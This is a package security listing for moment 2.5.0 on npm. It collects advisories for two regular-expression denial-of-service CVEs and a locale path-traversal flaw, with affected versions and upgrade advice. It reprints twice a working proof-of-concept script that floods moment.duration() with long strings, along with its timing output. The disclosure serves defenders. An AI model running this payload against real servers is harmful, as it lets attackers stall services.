NodeJS/moment/2.5.0


Parse, validate, manipulate, and display dates

https://www.npmjs.com/package/moment
MIT

5 Security Vulnerabilities

Regular Expression Denial of Service in moment

Published date: 2018-03-05T18:35:09Z
CVE: CVE-2017-18214
Links:

Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.

Recommendation

Update to version 2.19.3 or later.

Affected versions: ["1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.3.0", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.7.0", "1.7.1", "1.7.2", "2.0.0", "2.1.0", "2.2.1", "2.3.0", "2.3.1", "2.4.0", "2.5.0", "2.5.1", "2.6.0", "2.7.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.9.0", "2.10.2", "2.10.3", "2.10.5", "2.10.6", "2.11.0", "2.11.1", "2.11.2", "2.12.0", "2.13.0", "2.14.0", "2.14.1", "2.15.0", "2.15.1", "2.15.2", "2.16.0", "2.17.0", "2.17.1", "2.18.0", "2.18.1", "2.19.0", "2.19.1", "2.19.2"]
Secure versions: [2.29.4, 2.30.0, 2.30.1]
Recommendation: Update to version 2.30.1.

Regular Expression Denial of Service in moment

Published date: 2017-10-24T18:33:35Z
CVE: CVE-2016-4055
Links:

Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().

Proof of concept

var moment = require('moment');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=20000;i<=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Recommendation

Please update to version 2.11.2 or later.

Affected versions: ["1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.3.0", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.7.0", "1.7.1", "1.7.2", "2.0.0", "2.1.0", "2.2.1", "2.3.0", "2.3.1", "2.4.0", "2.5.0", "2.5.1", "2.6.0", "2.7.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.9.0", "2.10.2", "2.10.3", "2.10.5", "2.10.6", "2.11.0", "2.11.1"]
Secure versions: [2.29.4, 2.30.0, 2.30.1]
Recommendation: Update to version 2.30.1.

Path Traversal: 'dir/../../filename' in moment.locale

Published date: 2022-04-04T21:25:48Z
CVE: CVE-2022-24785
Links:

Impact

This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.

Patches

This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).

Workarounds

Sanitize user-provided locale name before passing it to moment.js.

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory: * Open an issue in moment repo

Affected versions: ["1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.3.0", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.7.0", "1.7.1", "1.7.2", "2.0.0", "2.1.0", "2.2.1", "2.3.0", "2.3.1", "2.4.0", "2.5.0", "2.5.1", "2.6.0", "2.7.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.9.0", "2.10.2", "2.10.3", "2.10.5", "2.10.6", "2.11.0", "2.11.1", "2.11.2", "2.12.0", "2.13.0", "2.14.0", "2.14.1", "2.15.0", "2.15.1", "2.15.2", "2.16.0", "2.17.0", "2.17.1", "2.18.0", "2.18.1", "2.19.0", "2.19.1", "2.19.2", "2.19.3", "2.19.4", "2.20.0", "2.20.1", "2.21.0", "2.22.0", "2.22.1", "2.22.2", "2.23.0", "2.24.0", "2.25.0", "2.25.1", "2.25.2", "2.25.3", "2.26.0", "2.27.0", "2.28.0", "2.29.0", "2.29.1"]
Secure versions: [2.29.4, 2.30.0, 2.30.1]
Recommendation: Update to version 2.30.1.

Moderate severity vulnerability that affects moment

Published date: 2018-07-31T23:03:17Z
CVE: CVE-2016-4055
Links:

Withdrawn, accidental duplicate publish.

The duration function in the moment package before 2.11.2 for Node.js allows remote attackers to cause a denial of service (CPU consumption) via a long string, aka a regular expression Denial of Service (ReDoS).

Affected versions: ["1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.3.0", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.7.0", "1.7.1", "1.7.2", "2.0.0", "2.1.0", "2.2.1", "2.3.0", "2.3.1", "2.4.0", "2.5.0", "2.5.1", "2.6.0", "2.7.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.9.0", "2.10.2", "2.10.3", "2.10.5", "2.10.6", "2.11.0", "2.11.1"]
Secure versions: [2.29.4, 2.30.0, 2.30.1]
Recommendation: Update to version 2.30.1.

Regular Expression Denial of Service

Published date: 2016-01-26
CVEs: ["CVE-2016-4055"]
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Coordinating vendor: ^Lift Security
Links:

moment is vulnerable to regular expression denial of service when user input is passed unchecked into moment.duration() blocking the event loop for a period of time.

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time. [1]

It's not a huge amplification it takes about 25k characters to get 1.1 seconds however that's well under most servers max request size so it's certainly exploitable.

The regular expression in question

moment/2.10.6/moment.js 1679 var aspNetRegex = /(\-)?(?:(\d*)\.)?(\d+)\:(\d+)(?:\:(\d+)\.?(\d{3})?)?/;

Proof of concept

var moment = require('moment');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=20000;i<=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Timeline:

  • 10/26/2015 - Initial Discovery
  • 10/26/2015 - Maintainers notified via email
  • 12/16/2015 - Maintainers notified via email again
  • 2/2/2016 - Added information to fix from pull request
  • 2/3/2016 -

Affected versions: ["1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.3.0", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.7.0", "1.7.1", "1.7.2", "2.0.0", "2.1.0", "2.2.1", "2.3.0", "2.3.1", "2.4.0", "2.5.0", "2.5.1", "2.6.0", "2.7.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.9.0", "2.10.2", "2.10.3", "2.10.5", "2.10.6", "2.11.0", "2.11.1"]
Secure versions: [2.29.4, 2.30.0, 2.30.1]
Recommendation: Please update to version 2.11.2 or greater. If you are unable to update more information is available below. A fix [has been made available in a pull request](https://github.com/moment/moment/pull/2939). Do not allow untrusted user input into `moment.duration()` or truncate the length of the allowed input to reduce blocking potential. in moment.js change line 1819 from `var aspNetRegex = /(\-)?(?:(\d*)[. ])?(\d+)\:(\d+)(?:\:(\d+)\.?(\d{3})?)?/;` to `var aspNetRegex = /^(\-)?(?:(\d*)[. ])?(\d+)\:(\d+)(?:\:(\d+)\.?(\d{3})?(?:\d*)?)?$/;`

76 Other Versions

Version License Security Released
2.30.1 MIT 2023-12-27 - 10:38 11 months
2.30.0 MIT 2023-12-26 - 19:36 11 months
2.29.4 MIT 2022-07-06 - 16:01 over 2 years
2.29.3 MIT 1 2022-04-17 - 18:27 over 2 years
2.29.2 MIT 1 2022-04-03 - 13:18 over 2 years
2.29.1 MIT 2 2020-10-06 - 11:21 about 4 years
2.29.0 MIT 2 2020-09-22 - 08:31 about 4 years
2.28.0 MIT 2 2020-09-13 - 11:27 about 4 years
2.27.0 MIT 2 2020-06-18 - 22:00 over 4 years
2.26.0 MIT 2 2020-05-20 - 06:46 over 4 years
2.25.3 MIT 2 2020-05-04 - 15:13 over 4 years
2.25.2 MIT 2 2020-05-04 - 12:29 over 4 years
2.25.1 MIT 2 2020-05-01 - 18:51 over 4 years
2.25.0 MIT 2 2020-05-01 - 01:27 over 4 years
2.24.0 MIT 2 2019-01-21 - 21:10 almost 6 years
2.23.0 MIT 2 2018-12-13 - 06:49 almost 6 years
2.22.2 MIT 2 2018-06-01 - 06:58 over 6 years
2.22.1 MIT 2 2018-04-15 - 06:06 over 6 years
2.22.0 MIT 2 2018-03-30 - 22:06 over 6 years
2.21.0 MIT 2 2018-03-02 - 20:41 over 6 years
2.20.1 MIT 2 2017-12-19 - 04:44 almost 7 years
2.20.0 MIT 2 2017-12-17 - 01:15 almost 7 years
2.19.4 MIT 2 2017-12-11 - 01:11 almost 7 years
2.19.3 MIT 2 2017-11-29 - 16:28 almost 7 years
2.19.2 MIT 3 2017-11-11 - 20:34 about 7 years
2.19.1 MIT 3 2017-10-11 - 21:02 about 7 years
2.19.0 MIT 3 2017-10-10 - 09:40 about 7 years
2.18.1 MIT 3 2017-03-21 - 22:58 over 7 years
2.18.0 MIT 3 2017-03-18 - 21:14 over 7 years
2.17.1 MIT 2 2016-12-04 - 05:48 almost 8 years
2.17.0 MIT 2 2016-11-22 - 13:48 almost 8 years
2.16.0 MIT 2 2016-11-10 - 06:54 about 8 years
2.15.2 MIT 2 2016-10-24 - 06:49 about 8 years
2.15.1 MIT 2 2016-09-21 - 03:39 about 8 years
2.15.0 MIT 2 2016-09-12 - 09:27 about 8 years
2.14.1 MIT 2 2016-07-04 - 06:44 over 8 years
2.14.0 MIT 2 2016-07-04 - 05:11 over 8 years
2.13.0 MIT 2 2016-04-18 - 07:41 over 8 years
2.12.0 MIT 2 2016-03-07 - 09:23 over 8 years
2.11.2 MIT 2 2016-02-03 - 22:47 almost 9 years
2.11.1 MIT 5 2016-01-09 - 13:17 almost 9 years
2.11.0 MIT 5 2016-01-02 - 23:38 almost 9 years
2.10.6 MIT 5 2015-07-28 - 04:45 over 9 years
2.10.5 MIT 5 2015-07-26 - 09:33 over 9 years
2.10.3 MIT 5 2015-05-13 - 07:54 over 9 years
2.10.2 MIT 5 2015-04-09 - 06:39 over 9 years
2.9.0 MIT 5 2015-01-08 - 15:01 almost 10 years
2.8.4 MIT 5 2014-11-19 - 04:47 almost 10 years
2.8.3 MIT 5 2014-09-05 - 08:06 about 10 years
2.8.2 MIT 5 2014-08-22 - 13:55 about 10 years
2.8.1 MIT 5 2014-08-01 - 17:21 over 10 years
2.7.0 MIT 5 2014-06-12 - 07:05 over 10 years
2.6.0 MIT 5 2014-04-12 - 16:39 over 10 years
2.5.1 MIT 5 2014-01-22 - 09:28 almost 11 years
2.5.0 MIT 5 2013-12-23 - 21:09 almost 11 years
2.4.0 MIT 5 2013-10-27 - 02:26 about 11 years
2.3.1 MIT 5 2013-10-09 - 02:38 about 11 years
2.3.0 MIT 5 2013-10-07 - 08:30 about 11 years
2.2.1 MIT 5 2013-09-12 - 08:39 about 11 years
2.1.0 MIT 5 2013-07-07 - 20:33 over 11 years
2.0.0 MIT 5 2013-02-08 - 19:13 almost 12 years
1.7.2 MIT 5 2012-10-02 - 17:17 about 12 years
1.7.1 MIT 5 2012-10-01 - 17:33 about 12 years
1.7.0 MIT 5 2012-07-25 - 19:10 over 12 years
1.6.2 MIT 5 2012-05-04 - 17:20 over 12 years
1.6.1 MIT 5 2012-04-26 - 22:30 over 12 years
1.6.0 MIT 5 2012-04-26 - 16:50 over 12 years
1.5.1 MIT 5 2012-04-06 - 02:08 over 12 years
1.5.0 MIT 5 2012-03-19 - 19:44 over 12 years
1.4.0 MIT 5 2012-02-03 - 19:16 almost 13 years
1.3.0 MIT 5 2012-01-05 - 17:51 almost 13 years
1.2.0 MIT 5 2011-12-06 - 18:33 almost 13 years
1.1.1 MIT 5 2011-11-11 - 19:16 about 13 years
1.1.0 MIT 5 2011-10-27 - 23:21 about 13 years
1.0.1 MIT 5 2011-12-06 - 18:33 almost 13 years
1.0.0 MIT 5 2011-12-06 - 18:33 almost 13 years